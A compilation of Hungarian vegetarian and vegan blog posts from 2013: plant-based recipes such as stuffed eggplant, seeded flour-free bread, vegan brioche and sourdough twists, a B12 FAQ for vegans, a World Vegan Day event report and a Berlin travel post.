Őszi és téli ízek keveredése egy kis egzotikummal a padlizsán személyében a télben.:) A dió nagyon feldobja és elegánssá teszi az egyszerű sütőtököt, így akár Karácsonykor is bevethető!;) Nagyon jól passzol hozzá bármilyen zöld leveles saláta, vagy akár ez a mentás uborkasaláta. Diós sütőtökkel töltött padlizsán Elkészítési idő: 30 perc előkészítés + kb. 40 perc sütés Hozzávalók (4 főre):2 nagy padlizsán 200 g sütőtök, megtisztítva, kimagozva, feltisztítva 1/2 lila hagyma, vékonyra szeletelve 1 tk. köménymag (vagy kicsit kevesebb őrölt kömény) 2 gerezd fokhagyma, vékonyra szelve 4 ek. olívaolaj 2 tk. friss zöldfűszer (pl. kakukkfű, oregánó, zsálya, vagy rozmaring) 100 g mandulás (DM-ből), vagy füstölt tofu, felkockázva 1 nagy marék dió kicsit megpirítva és félbe vágva Melegítsük elő a sütőt 200 fokra. Vágjuk félbe a padlizsánokat, és egy kanál segítségével vájjuk ki a belsejét a szélektől 1 cm-ig. A kivágott padlizsánhúst aprítsuk fel és egy tálban keverjük össze a sütőtökkel és a lila hagymával. Adjuk hozzá a köményt, a fokhagymát, 2 ek. olajat, majd sózzuk-borsozzuk. Tegyük a keveréket egy sütőpapírral bélelt, vagy kiolajozott tepsire. A kivájt padlizsánok belsejét kenjük meg vékonyan olajjal, sózzuk-borsozzuk, és szintúgy tegyük egy kiolajozott tepsire. Mindkettőt süssük 15-20 percig, amíg félig készre sülnek. Utána a sült zöldségkeverékhez adjuk hozzá a friss zöldfűszert, a tofut és a diót, majd kanalazzuk bele a padlizsánokba. Locsoljuk meg 1 evőkanál olajjal és toljuk vissza a sütőbe még 20 percre. Eredeti recept: Good Food - Vegetarian Christmas
Gesztenyepüré 6+
A felnőtt változat receptje itt található. Az olajos magvak közül ez a kevésbé energiadús, viszont B vitaminokban gazdag, és az édeskés íze miatt (nem csak) a babák kedvelik. 8-10 db gesztenye kb. két adagra elég. Persze a növény méretétől is függ, de a Spárban most szép nagyokat kaptunk. A gesztenyéket a hegyüknél négyzet alakban jól be kell vágni, és jó darabig főzni, míg a belseje meg nem puhul. Volt már olyan, hogy az öreg gesztenyét még meghámozva főznöm kellett utána egy ideig. A megpucolt gesztenyéket némi vaníliával ízesítjük, és finomra turmixoljuk. Nem szükséges édesíteni, önmagában is kellemes ízű.
Ropogós, magvakkal teli kenyér (liszt- és élesztőmentes)
2013. november 16. Zizi kalandjai
Végre sütöttem valamit! Az utóbbi időben ilyen ritkán fordult elő! Használom a sütőt, de többnyire sütőtököt készítek. Igaz a héten megint bekapcsoltam, készítettem egy tepsi rakott sütőtököt, ami a hűtőben lévő maradékokból lett összedobva és mint mindig, az ilyen ételek a legsikeresebbek és legfinomabbak. Igaz?
Ez a kenyér nem olyan, mint a többi. Ez más. Egy újfajta dimenzióba repít… elkészíteni végtelen egyszerű, a “tésztáját” összedobni kb. 2 perc, aztán igaz hagyjuk pihenni néhány órát vagy egy éjszakát, de semmi dolgunk nincsen vele, csak berakjuk a sütőbe, várunk kb. 30-40 percet és kész is a csoda. A kenyér.
És, hogy miből áll? Van benne napraforgómag, mandula, lenmag, chia mag, zabpehely, egy kis juharszirup, kókuszolaj, só és egy különleges – nekem újdonságnak számító – alapanyag: útifű maghéj. Ez is egy superfood, vagyis szuper élelmiszer, sok-sok olyan tulajdonsággal, amelyek kedvezően hatnak a szervezetünkre.
Elsőként említendő 85%-os (!!!) rosttartalma, amely elősegíti a bélfalon található lerakódásokat kipucolni a szervezetünkből, ha kúraszerűen fogyasztjuk. Ezenkívül csökkenti a koleszterin- és vércukorszintet, tisztítja a nyirokrendszert, enyhíti a fáradtságot, valamint segít székrekedéses panaszok esetén is. Vegetáriánus zselésítő anyagként is használható (hasonlóan a lenmaghoz és a chia maghoz) állati zselatin helyett. Még több információ erről a fantasztikus szerről itt, ahol megtalálhatjátok az is, hogy hogyan alkalmazzuk kúraszerűen (néhány recept itt, egy videó pedig itt).
Ha sikerül beszereznetek ezt az alapanyagot (online vagy bio boltokban, reformboltokban keressétek) feltétlen próbáljátok ki ezt a kenyeret, ami egyébként rendkívül “elfoglalt anyuka barát” verzió. Azt hiszem, az, hogy úgy süthetünk kenyeret, hogy 2 percig tart előkészíteni, mindenképpen fontos a ma rohanó emberének. A recept Sarah-tól van, aki egy barátnőjétől tanulta. Olyan igazi skandináv, sötét, enyhén édeskés kenyér. Legközelebb én egy kicsivel több sót fogok beletenni, hogy egy picit elvegyek az édeskés ízéből. Simán sütve is kiváló, azonban pirítva, házi kesudióvajjal és anyukám cukormentes szilvalekvárjával megkenve, igazi energiabomba reggelinek számít.
Ropogós magvakkal teli kenyér (liszt- és élesztőmentes)
Hozzávalók:
- 1 bögre napraforgómag
- 1/2 bögre lenmag
- 1/2 bögre mandula (vagy törökmogyoró)
- 1 és 1/2 bögre zabpehely
- 4 evőkanál útifű maghéj
- 2 evőkanál chia mag
- 1 teáskanál só
- 1 evőkanál juharszirup
- 3 evőkanál kókuszolaj (olvasztva)
- 1 és 1/2 bögre víz
(A recepthez használt bögre 250 ml-es.)
Lehetőleg egy szilikon kenyérformát (például ilyet) használjunk, amelyből könnyű kifordítani a kenyeret és nem kell kikenni, kibélelni semmivel.
A szilikon formában keverjük össze a száraz hozzávalókat: napraforgómag, lenmag, mandula, zabpehely, útifű maghéj, chia mag és só. Egy tálkában keverjük össze a vizet, a juharszirupot és a kókuszolajat (figyeljünk rá, hogy a víz ne legyen nagyon hideg, hogy a kókuszolaj ne kezdjen el megszilárdulni). Ezt a nedves keveréket öntsük a szilikon formába és kanállal jól keverjük el, hogy a száraz hozzávalókat mindenhol befedje a nedves keverék. Ilyenkor adhatunk még hozzá 1-2 teáskanál vizet, de egyesével adagolva, hogy tényleg nedves legyen a “kenyértészta” (nekem szükség volt még néhány teáskanálnyi vízre, hogy jól összeálljon). A kanállal szépen simítsuk, lapítsuk le a tetejét és hagyjuk a konyhapulton állni legalább 2 órát vagy egy éjszakát (én az utóbbit javaslom, ha így járunk el, akkor takarjuk le egy konyharuhával).
Melegítsük elő a sütőt 175 fokra. Tegyük a szilikon formát a sütőbe, középre a rácsra. Süssük 20 percig. Ekkor vegyük ki és óvatosan, kesztyű segítségével fordítsuk ki a kenyeret a formából és fejjel lefelé tegyük vissza a sütőbe, közvetlenül a rácsra és süssük kb. 40 percig. Akkor jó, ha enyhén megütögetjük egy kanállal és üreges hangot hallunk.
Várjuk meg, amíg teljesen kihűl, csak utána szeleteljük. Dobozban tárolva 4-5 napig eláll, de nem fog addig kitartani!
Csoda golyók - nyersen
2013. november 12. Govinda Vegetáriánus konyhája
Ha édességre vágysz, olyanra, melyben nincs hozzáadott cukor - akkor lelkesítsd fel magad és készítsd el. Nagyon sok barátot fogsz szerezni magadnak.
Vegán almás fahéjas palacsinta juharsziruppal
2013. november 10. Zizi kalandjai
Hol vannak már a jó kis palacsintás vasárnapi reggelik? Egyszerűen nem jut most idő ilyenre, mert van egy örökmozgónk, aki állandó figyelmet követel és hiába kuktáskodik már mellettem 4 hónapos kora óta , azért annyira még nem érdeklődik a főzés iránt, hogy órákat töltsön velem a konyhában. Naponta egy alkalommal tudok főzni/sütni vagy ebédre vagy vacsorára és többnyire valami egyszerűt dobok össze az éppen rendelkezésre álló alapanyagokból. Így született már gombapörkölt brokkolival extrázva vagy megmaradt brokkolis paradicsomos szósz tükörtojással vega pecsenyezsíros pirítóssal és sok-sok nyers zöldséggel; ha van sült sütőtök, akkor percek alatt összedobok egy sütőtökös póréhagymás tésztát vagy az egyik kedvencem a pirított fokhagymás tofu kockák rizzsel és valamilyen zöldséggel tálalva. Igen, a kombinációk tárháza kifogyhatatlan! A lényeg az egyszerűségen és a gyorsaságon van.
Remélem hamarosan visszatérhetek a konyhába több időre, akár, hogy palacsintát süssek… addig pedig marad a villámgyorsan elkészíthető és isteni finom mandulavajas zabkása. Ez most a hetente többször előforduló favorit reggeli. Ez azért is jó, mert a zab főleg téli eledel melegítő hatása miatt (és egy kis melegség nem árt most testnek és léleknek), anyatej serkentő hatásáról nem is beszélve (szoptatós anyukáknak kötelező)!
Szóval ez az almás fahéjas palacsinta még korábban készült, amikor készültem előre, hogy a blogon mindig legyenek új receptek, akkor is, amikor kevesebb időm marad a főzésre. Ugyanúgy, mint a többi palacsinta recept, nem bonyolult elkészíteni, tehát adjatok neki egy esélyt jövő hétvégén. Ja, a tésztáját csak az alma édesíti, szóval cukormentes is!
Vegán almás fahéjas palacsinta juharsziruppal
Hozzávalók kb. 10 db-hoz:
- 1 bögre teljeskiörlésű tönkölyliszt
- 1/2 bögre és 2 evőkanál tönköly fehérliszt
- 1 és 1/2 evőkanál foszfátmentes sütőpor
- 1/2 teáskanál fahéj
- 1 és 1/2 bögre zabtej (rizstej, mandulatej, szójatej is használható)
- 2 evőkanál kókuszolaj
- 1 közepes alma, reszelve
- csipet só
- juharszirup
Egy tálban keverjük össze a száraz hozzávalókat: lisztek, sütőpor, fahéj, só. Egy másikban pedig a nedves hozzávalókat: zabtej, kókuszolaj, reszelt alma. Öntsük a nedves hozzávalókat a szárazhoz és keverjük addig, amíg sima, sűrű tésztát kapunk (ha túl sűrűnek találjuk, hígítsuk egy kevés zabtejjel). Hagyjuk 5 percet állni, hogy a tészta megkeljen.
Tegyünk egy kevés kókuszzsírt a teflonserpenyőbe és forrósítsuk fel. Kisebb adagot kanalazunk (2 adag is mehet egyszerre) a palacsinta tésztából a serpenyőbe, közepes lángon sütjük az egyik oldalukat, amíg aranybarnák lesznek. Megfordítjuk és a másik oldalukon is sütjük 1-2 percig. Tálaljuk juharsziruppal meglocsolva.
Édes bűnök - a fahéjas briós
2013. november 7. La Veganista
Ezt a receptet Limara oldalán találtam (a tészta formázásáról is nála láthattok remek képeket). Legalább egy éve rendszeresen sütöm veganizált változatban. Általában a vasárnap reggeli kávé mellé készül el. Mindig kicsábítja a konyhába a ragadozókat, akik egy pillanat alatt felfalják. Kisülés után félórával már csak a briósok édes, fahéjas illata marad. Ha ízlett ez a verzió, érdemes kipróbálni akár mákos és diós töltelékkel, nálunk az is jól fogy.
Hozzávalók:
- 50 dkg BL55 finomliszt
- csipet só
- 1/4 tk őrölt Bourbon vanília - elhagyható
- 3 ek olívaolaj
- 2,5 - 3dl ízesítetlen rizstej (legyen tartalékban plusz langyos rizstej, mert lisztfüggő, hogy mennyit vesz fel) + 2-3 kanálnyi a kenéshez
- 7 dkg cukor
- 1 csomag instant élesztő
- 10 dkg puha kókuszzsír
- fahéj
- porcukor
Így készítsd el:
A lisztet kimérjük, tálba szitáljuk. Belekeverjük a csipetnyi sót, és a vaníliát.
Az élesztőt a cukor és egy kanálnyi liszt társaságában elkeverjük a meglangyosított rizstejben. Hagyjuk aktiválódni. (Elindul felfelé és barna hab képződik a tetején.)
Az élesztős rizstejet a lisztre öntjük, hozzáadjuk az olívaolajat, és néhány perc alatt összedolgozzuk. Ezután lefedve félretesszük, hogy háborítatlanul megkelhessen 1-1,5 óra alatt.
A megdagasztott tésztát lisztezett gyúródeszkára borítjuk, 8-10 egyenlő részre osztjuk (Használjunk mérleget, ha szemre nem megy, hogy egyformák legyenek a briósok.)
A tésztadarabokból gyúrjunk zsemlebucikat és pihentessük a deszkán negyedórát. (Pihentetés nélkül sokat fogunk káromkodni, mert a tészta ellenáll majd a nyújtási kísérletünknek.)
Az újra puha bucikat egymás után ovális formára nyújtjuk vékonyan megkenjük puha kókusz zsírral, és bőséggel megszórjuk fahéjas porcukorral, és feltekerjük. Ügyeljünk rá, hogy mindenhol odatapadjon a tészta, különben kifolyik belőle a töltelék.
A tenyerünk alatt sodorva, hurkaformájúra nyújtjuk a deszkán a megtöltött tésztát, és az egyik végét lelapítva, csiga alakban feltekerjük.
A megformázott briósokat a sütőpapírral bélelt tepsibe tesszük. Próbáljuk olyan távolságra elhelyezni őket egymástól, hogy lehetőleg sülés közben ne dagadjanak össze.
Adjunk a tésztának újabb 20-30 percet, hogy konyharuhával letakarva pihenjen a sütőlemezen. Eközben melegítsük elő a sütőt 180 °C-ra.
Mielőtt betoljuk a tepsibe, a briósok tetejét kenjük meg langyos rizstejjel, 15-18 perc alatt süssük aranybarnára. Szedjük ki hűtőrácsra, és ne tápláljunk hiú reményeket. Nem lesz ideje kihűlni.
Csavart fűszeres kifli kovászos tésztából
Valamikor jó régen próbálkoztam a kovász készítéssel, de ha jól emlékszem, mielőtt megérett volna elfogyott a türelmem, vagy "megdöglött" szegény, és nem sütöttem végül belőle. Azután a por alakúval is kísérleteztem, de az nem volt finom, így elhalt az ez irányú lelkesedésem. Újabban viszont a Kiskunfélegyházi pékségnek a teljes őrlésű tönköly kenyerét eszem néha, ami nagyon finom kovászolt cipó. Van itt Csepelen egy mintaboltja, ahol még tk lisztet tartalmazó kakaós csigájuk is van. Igaz, hogy három hete a Férj azt mondta, hogy ez már túl egészséges, merthogy só és köménymag is volt rajta. :) (Biztosan ráborult a sóskifli, mert olyasmi volt a feltét.) A kovászoláshoz más löket is volt, az élesztő helyett kellett valakinek alternatíva, így nekiálltam újra. Megvettem a tk rozslisztet, hazamentünk - mert itt eltört a fali mérlegem, így hasra "mérek" mindent. Limara módszeréből indultam ki. Érdemes végigolvasni, hogy mit ír. Még egy helyet javaslok, ami nagyon összeszedett, és aminek a javaslata alapján egyszer még a bigát elkészítem. Még van Tatánál pont erre alkalmas szőlő. Maga a kovászolás menete nem olyan bonyolult, mint amilyennek tűnik. 1. Veszünk egy üveget, lemérjük. A 720 ml-esek általában 300 g körül vannak. 2. Beleöntünk 50 g tk rozslisztet és 50 g langyos vizet. (szűrt víz, ne legyen klóros, vagy hagyjuk előtte állni) 3. Meleg helyre tegyük, de legalábbis egyenletes hőmérsékletűre. A Limara féle mikrós ötlet jó. 4. 24 órán belül el kell indulnia érni, savanyodni. Nekem péntek estéről szombat estére egészen beindult. 5. 12 óránként etetgetjük. Az üvegben csak 50 g-ot hagyunk a tésztából, a többit kiborítjuk minden alkalommal. 6. Hozzáadunk 50 g tk rozslisztet és 50 g langyos vizet. Összekeverjük, a csavart lazán rátesszük az üvegre, és visszarakjuk meleg helyre. 12 óra elteltével újra kezdjük az egészet. 7. 7-8 nap után érett kovászt kapunk, ami már elegendő energiával bír a kenyér kelesztéséhez. 8. Ettől kezdve napi egyszer etetendő.Ha nincs szükségünk rá, a hűtőbe tehető. Onnan kivéve 3 napig etetgetni kell, és újra használható. Azért a 12 óra nem szentírás, csak kb. Meg szerintem az 50 g sem. Mivel itthon nincs mérlegem, úgy szemre csináltam. Otthon megnéztem, hogy kb. 3 kanálnyi liszt az a mennyiség. Az a lényeg, hogy galuska tészta állagú legyen a masszánk. Duplán etettem két üvegben, és reggel volt plusz adag a csavart kiflihez. Sajnos nem kelt órákat a hűtőben a duplájára. Az lett volna az igazi, mivel az kedvez az élesztőgombák szaporodásának, így még kemény lett a héja, viszont belül valami elképesztően kellemes állagú, puha, kissé sűrűbb tésztát kap az ember. A békési 2 kilós kenyerek voltak ilyenek, mikor még kicsi voltam. Melegben gyorsabban kel, de ezzel együtt a fehérje bontás jelentősebb. Meg valószínűleg a formát is elveszti. A hozzávalókat szemre mértem (ami azért szerintem egész jól működik), így előfordulhat, hogy a tésztát összeállítva kicsit több folyadékot igényel, vagy lisztet, de azért merem leírni, mert azt gondolom működik a recept, és érdemes kipróbálni a kovászolást. Nagyon finom. Mivel nem tudtam a végeredményt, csak fehér lisztet adtam hozzá, de legközelebb növelem a tk arányát. Mivel sütőtök krémleves mellé készült, fűszereket is adtam hozzá. Egyszer már sütöttem ilyesmit, az nagyon ízlett a Férjnek is, az a kakukkfüves hagymás bagett volt. Hozzávalók: 40 dkg finomliszt 200 g rozskovász 200 ml víz 4 ek olivaolaj 1-1 tk mag (lenmag, szezámmag, napraforgómag) 1-1 csipet kakukkfű, bazsalikom 1 tk só A kovászt előzőleg dupla adaggal etetjük, nem dobjuk ki a maradékot, hanem a mennyiségének megfelelően növeljük a liszt és víz arányát. Reggelre szépen megbuborékosodik, így alkalmas arra, hogy megkelessze a kenyerünket, vagyis borulhat a nagy vajlingba. A száraz hozzávalókat összekeverjük, majd belekeverjük a kovászt, olajat és a vizet. Alaposan meggyúrjuk, azután a hűtőszekrényben kelesztjük a duplájára. Nekem csak rövid ideig kelt, de az az igazi, ha legalább 5-6 óra telik el, míg a kovász dolgozik. Olajos kézzel formázzuk, zsírpapírral kibélelt tepsibe tesszük, letakarjuk, azután várunk, míg újra a duplájára kel, és hideg sütőben indítjuk útjára. A sütő aljára egy tálba vizet teszünk, és a tésztát 190 C-on sütjük bő egy óra hosszát. Legközelebb elkészítem hosszú kelesztéssel, akkor nem lesz ugyan ilyen formás, mint a képen, de kérges sem. Ez utóbbi pedig egyébként nem volt rossz, mert a vastag, jó ropogós héja illett számomra a sütőtök krémleveshez.
B12 - a vegán életmód Achilles-sarka?
2013. november 4. La Veganista
A nagy B12 vita mindig akkor lángol fel, ha valaki vegán életmódra vált. Sokszor a barátok, jóakarók kezdenek aggódni, máskor a vegán közösségen belül folynak parázs viták arról, ki honnan szerzi a B12-t. Harmadsorban (ez a legszomorúbb), vannak akik a saját bőrükön tapasztalják meg, hogy milyen következményekkel jár a hiánya. Emiatt akár fel is hagynak a vegán életmóddal, pedig csak annyit kellett volna tenniük, hogy odafigyelnek a vitaminpótlásra. Mivel a Vegán Világnapon is feltettek kérdéseket ezzel kapcsolatban, úgy gondoltam egy poszt erejéig érintem a témát. Jó hír egyébként, hogy a Magyar Vegán Társaság már dolgozik egy B12-ről szóló, átfogóbb információs anyagon, amit hamarosan közread.
Mi a fene az a B12?
Mikroorganizmusok állítják elő, vízben oldódó vitamin, amely nélkülözhetetlen az emberi szervezet számára. Szükségünk van rá többek közt a vörösvértest képzéshez, a fehérjeszintézishez, a nukleinsavak építéséhez, a sejtanyagcseréhez, valamint a központi idegrendszer működéséhez. Két biológiailag aktív formája ismert. A természetes a methylcobalamin és az adenosylcobalamin, a szintetikusan előállított a cyanocobalamin.
Miért alakul ki B12 hiány?
Vegánok esetében főként azért, mert a növényi étrend bármennyire is vitamindús, a szervezet számára szükséges mennyiségben a vitamin aktív formáját nem tartalmazza.
Csak vegánoknál alakulhat ki B12 hiány?
Egyáltalán nem. Számos betegség jár felszívódási problémával, vagy a felszívódáshoz szükséges intrinsic faktor hiányával. Emiatt a szervezet még akkor sem jut elegendő B12 vitaminhoz, ha valaki mindenevő:
- krónikus, sorvadással járó gyomorgyulladás (a gyomornyálkahártya sejtjeiben termelődik az intrinsic faktor (belső tényező) nevű fehérje, ami lehetővé teszi a B12 vitamin felszívódását a vékonybél csípőbél szakaszán)
- gyomor és vagy vékonybél csonkolás
- örökletes enzimbetegség - intrinsic faktor veleszületett hiánya
- Crohn-betegség
- Cöliákia
- időskori felszívódási zavarok
- vékonybélben elszaporodó baktériumok
- parazita fertőzés (bélférgesség)
- túlzott alkoholfogyasztás
- autoimmun betegségek pl. Basedow-kór, szisztémás lupus erythematosus (bőrfarkas)
- savkötő gyógyszerek hosszan tartó alkalmazása
Ellenőrizhetem, hogy mennyi B12 van a szervezetemben?
Igen, a B12 szintje vérvétellel meghatározható. Ezt célszerű évente egyszer, a rutin vérvételhez kapcsolva elvégeztetni. A felszívódási zavar pedig Schilling-teszttel igazolható.
Meddig bírom ki B12 pótlása nélkül?
Egyénenként változó. Noha a B12 vízben oldódó vitamin, a máj képes tárolni. Átlagosan kb. 2000-5000 mikrogrammnyi raktározódik belőle. Ez több éven keresztül (egyes források szerint 3-6 év) is biztosítja a B12 ellátást. Akinek ennél kevesebb van raktáron, annál hamarabb jelentkeznek a tünetek.
Mik a B12 hiány tünetei?
Mivel vérképzési (anémia perniciosa, megaloblasztos anémia) és idegrendszeri problémákat okoz, ezért a tünetek az ezekre jellemző képet mutatják. Sápadtság, fáradékonyság, légszomj, szapora szívverés, megnagyobbodott lép, tükörnyelv, gyomor, bélrendszeri zavarok, végtagzsibbadás, egyensúlyzavar, reflexkiesés, kóros reflexek, izomgyengeség, járási nehézség, látászavar, memóriazavar, ingerlékenység, depresszió, hallucináció, személyiségzavarok, szellemi leépülés.
Miben van B12?
A szakirodalom jelenlegi álláspontja szerint állati eredetű táplálékból szerezhető meg (máj, hús, hal, tojás, tejtermékek). Mivel ezeket a vegán életmód teljességgel kizárja, más forrásokat kell keresni. Néhány cikk említi, hogy sörélesztőben, algákban, mosatlan organikus eredetű zöldségekben gyümölcsökben előfordul. A sörélesztőben, élesztőkben nincs (ha lenne benne hozzáadott formában, akkor ugyanúgy jeleznék a csomagoláson, mint a vegán Marmite címkéjén.). A sörélesztővel, algákkal, lucerna és búzacsírával kapcsolatos vegán reményeket az táplálja, hogy egyes vizsgálatok kimutattak bennük B12 vitamint, de ez az emberi szervezetszámára nem hasznosítható, úgynevezett inaktív analóg. Egyes oldalak a mosatlan, organikus eredetű gyümölcsöt és zöldséget említik még B12 forrásként, ha nem mossák meg fogyasztás előtt. Véleményem szerint, ha van is rajta biológiailag aktív B12, vannak vegánok, akik nem jutnak organikus módszerrel termelt növényekhez (például nekem sincs lehetőségem napi szinten fogyasztani), ha mégis, esélyes hogy megsikálja evés előtt (bevallom én is megmosom a biozöldségestől, vagy őstermelőtől vett növényeket. Ki tudja, hogy milyen személyi higiéniája volt a gyümölcsszedőknek, és mennyire volt tiszta a láda, amibe pakolták.). Vagyis ez sem mindenki számára elérhető, megbízható forrás.
Hogyan jutok hozzá a B12-höz, ha vegán vagyok?
A Vegan Society ajánlása szerint B12-vel dúsított élelmiszerek fogyasztásával, vagy táplálékkiegészítők szedésével. Ha valaki csak dúsított élelmiszereket fogyaszt, tudnia kell hogy egy adagban mennyi B12 található. Amennyiben kevesebb, mint a napi ajánlott mennyiség, úgy több adagot kell fogyasztani belőle, vagy más dúsított élelmiszerrel kell kombinálni. Sokan emiatt kényelmesebbnek tartják a táplálékkiegészítők szedését, melyek vitamintartalma koncentráltabb.
Túladagolhatom a B12-t?
Túladagolást, illetve mellékhatást, a hazai források nem írnak le. Bizonyos mennyiségű B12-t a máj képes tárolni, a felesleg pedig a vizelettel kiürül. Ennek ellenére nem ajánlják a túlfogyasztását, mert a lappangó daganatos folyamatokat felgyorsíthatja.
Fogyasztok B12-t, mégis hiánytüneteket észlelek magamon. Mi az oka?
- Túl sokat vártam a pótlással, ráadásul nem szedek eleget
- Rendszertelenül szedem, vagy az ajánlott mennyiségnél kevesebbet szedek így nem jut elég a szervezetembe
- Nem az előírásnak megfelelően veszem be a tablettát pl. nem rágom meg
- Felszívódási zavarom van
Mennyi B12-re van szüksége a szervezetemnek?
Az OÉTI ajánlása szerint felnőtteknél a napi ajánlott bevitel 2,5 ?g.
Mi a cikk konklúziója?
Mindegy, miben hiszel, algában, biogyümölcsben, vagy táplálékkiegészítőben. Ha vegán vagy, (de ha nem, akkor is) évente egyszer érdemes ellenőriztetni a B12 szinted, és ha szükséges, biztos forrásból pótold a vitamint, ezzel elkerülheted a hiánybetegség kialakulását.
Vegán délután a Liszt Ferenc téren
2013. november 2. La Veganista
A vegán világnap délutánján, egy aprócska vegán sziget nőtt ki a Liszt Ferenc tér aszfaltján. Az infóstandon szórólapok, könyvek, állatbarát kvíz és természetesen vegán kóstolni valók is helyet kaptak. Diós birsalmasajt, vöröslencse pástétomos szendvicsek, citromos-bazsalikomos tönkölypiskóta, magvakkal teli, aszalt energiaszelet, melyet lelkes önkéntesek készítettek.
Blogunk is komolyan vette a vegán ünnepet. Igazi békebeli, ám veganizált almás pitével, kakaós és fahéjas csigával, valamint babpástétomos házi graham bagettel kínálta az érdeklődőket.
Volt, aki kifejezetten bennünket keresett a téren. Így csatlakozott hozzánk Zsófi, a legfiatalabb vegán aktivista. Mindössze 12 éves, de már kilenc hónapja vegán. Családja elfogadta és komolyan veszi a döntését. Szülei, szívesen megfőzik kislányuknak a tápláló vegán étkeket. Zsófi választását barátai is tiszteletben tartják. Bár az iskolába az új rendelkezések miatt nem viheti be a saját ételét (ez mindenkire vonatkozik, nem a vegán ételeket tiltották ki a sulikból, hanem a házi kosztot), a napközi alól felmentést kapott, hogy otthon ehessen.
Kedves élelmezésvezetők, gyerekek egészségéért aggódó dietetikusok, döntéshozók, nem lenne egyszerűbb, ha a köztudottan egészségesebb és alacsonyabb költségű húsmentes menüt bevezetnék a sulimenzákra? Amerikában már tudják, hogy jó hatással van a gyerekekre. Nem kellene legalább kísérleti jelleggel itthon is kipróbálni? Remélem, hogy a magyar főiskolákon már ott tanulnak a jövő vegán RD-i (regisztrált dietetikus), akik Virginia Messina példáját követve megváltoztatják majd a helyes táplálkozásról vallott hazai nézeteket. A változásra nagy szükségünk van elnézve a magyar szív és érrendszeri, a rák (Magyarországon a legrosszabb a halálozási statisztika a 34 OECD ország közül), az elhízási és a cukorbetegségi statisztikákat. Lehet azzal takarózni, hogy kevés a pénz az egészségügyben, vagy hogy a korai diagnózis segítené a túlélést. Valahogy mindig kimarad a gondolatmenetből, a növényi étrend preventív és gyógyító hatása, amit a helytelen táplálkozás okozta metabolikus szindróma esetén már felismertek és ajánlanak.
Szerencsére az emberek egy része alapvetően nyitott a kérdésre, így infóstandunknál is mindig voltak érdeklődők, akik szívesen megkóstolták a vegán csemegéket. Sokan kitöltötték az állatbarát kvízt, és megdöbbenve szembesültek azzal, hogy a tojásipar élve darálja le a hím csibéket, vagy, hogy a borjakat már egy napos korukban elszakítják az anyjuktól. Volt, aki ez utóbbit tudta, mert korábban tejgazdaságban dolgozott.
Szépen gyűltek az aláírások a cirkuszi állathasználat elleni petíciós íven is. Az egyik aláíró elmondta, gyermekkorában sokkolta a rácsok mögé kényszerített állatok látványa, ezért többé nem akarta, hogy cirkuszba vigyék a szülei.
A kóstoltatás közben lehetőségünk volt beszélgetni az érdeklődőkkel, hasznos információkat kaptunk és adtunk. Kiderült, hogy sokan próbálkoztak már a vegán életmóddal. Akadt olyan, akit az orvosa beszélt le róla, mondván, hogy a vegán táplálkozásba bele fog halni. Mások a drága növényi tejeket kifogásolták. Ezt ott helyben többféle házi növényi tej recept megosztásával orvosoltuk. Sokan felvetették a vas, a kalcium, a protein és a B12 pótlás problémáját, amit az önkéntesek saját tapasztalataik és a rendelkezésre álló szakirodalom alapján készséggel megválaszoltak.
A legjobb fejek a gyerekek voltak, akik hamar átvették a vegán életérzést. Ők tudták, hogy a kis bocinak az anyja mellett a helye, hogy a malac ugyanannyi szeretetet és tiszteletet érdemel, mint a kutya, hisz az érző lények között nem tehető különbség. Tisztában voltak azzal is, hogy az állatok nem önszántukból vannak a cirkuszban.
A kóstoltató-állomásunk előtt nagy turistaforgalom zajlott, így időnként nemzetközi vizekre eveztünk angol nyelvű szórólapjaink segítségével. Volt akinek annyira megtetszett a vegán magyar almás pite, hogy Andrássy úti felfedező kalandja végén ismét visszatért a standhoz egy falatnyi kóstolóra.
Ahogy számítottunk rá, a napvégére elfogyott minden vegán étel. Nem tudjuk, hogy lesznek-e akik áttérnek a vegán életmódra, de azt láttuk, hogy az emberek nyitottan állnak a kérdéshez, és megérinti őket az állatok szenvedése.
Egy vegetáriánus Berlinben
2013. november 1. Vegasztrománia
Pihenni kell. Hiába imádom azt, amit csinálok, időnként időt és teret kell hagynom arra, hogy csak magamra figyeljek, és kiszakítsam magam a megszokottból. Most is ez történt. Régi vágy és ötlet vált valóra, pár napot Berlinben töltöttem. S bár tényleg kikapcsolódni mentem, nem tudtam nem szakmázni. Egész egyszerűen azért, mert Berlin az orrom előtt rebegtette vegetáriánus és vegán pilláit.
Nem ezért szerettem bele a városba, de hatalmas piros pont, hogy lépten-nyomon vegetáriánus kínálatokba, vegán helyekbe botlottam. Őrületesen felfrissítő (és sajnos eddig ismeretlen) élmény volt azzal szembesülni, hogy van olyan város, ahol nem magyarázkodnom kell, hogy miért nem kérek túrós csuszát, ha van rajta pörc ("Hiszen az nem hús!"), hanem válogathatok a különböző stílusú és kínálatú húsmentes helyek között.
Már másnap felfedeztem a berlini Hunyadi téri piacot (ottani nevén Boxhagener Markt), persze kicsit "vegányabb " változatát. Sarkán a Szimpla Kaffeehause-zal tényleg itthoni érzetet kelt, de ahogy beljebb merészkedünk a szombati gasztro-piacra, a rengeteg saját kertben termesztett bio zöldség és gyümölcs , illetve a zöldségkrém árus, aki kb. 20-féle vegetáriánus kencét árul kisbuszából (egyelőre) gyanússá teszi a dolgot.
Persze nem nehéz elképzelni, hogy milyen a vega helyzet ott, ahol külön bolthálózat van a vegánoknak.. A Warschauer Strassén található Veganz magában egyesít egy boltot, ahol mindenféle állati eredettől mentes élelmiszert megvásárolhatunk, egy kávézót, tele vegán szendvicsekkel, nyers sütikkel, valamint egy vegán cipőboltot. Nem kell címkéket bogarásznunk, nem kell külön szólnunk, hogy növényi tejet kérünk a latténkba, ehelyett azt kérdezik, hogy melyikkel kérjük az 5 lehetőség közül.
Igen, van gasztro-forradalom Magyarországon, és igen, vegetáriánus szempontból is változott a hozzáállás és kínálat az utóbbi években. De Berlint látva azt érzem, hogy bőven van még hova fejlődni. Elkeseredés helyett inkább elszántságot érzek, új löketet kapott bennem a vega küldetéstudat.
Az biztos, hogy megyek még Berlinbe, de nemcsak a vegetáriánus élet vonz vissza. Mindenesetre legközelebb biztosan ellátogatok a Vönerbe vegetáriánus dönerért!
Leveleskel tempeh saláta
2013. október 30. Zizi kalandjai
Korábban már volt szó itt a blogon a tempehről, de aki nem olvasta, annak gyorsan elmondom, hogy a tempeh főtt szójababból készülő, nemes penészes érleléssel előállított élelmiszer. Roppant tápláló, teljes értékű fehérjeforrás, amelyben az összes szükséges aminosav megtalálható. Ha hiszitek, ha nem a tempehből még bacon is készíthető! Egyszer tuti ki fogom próbálni.
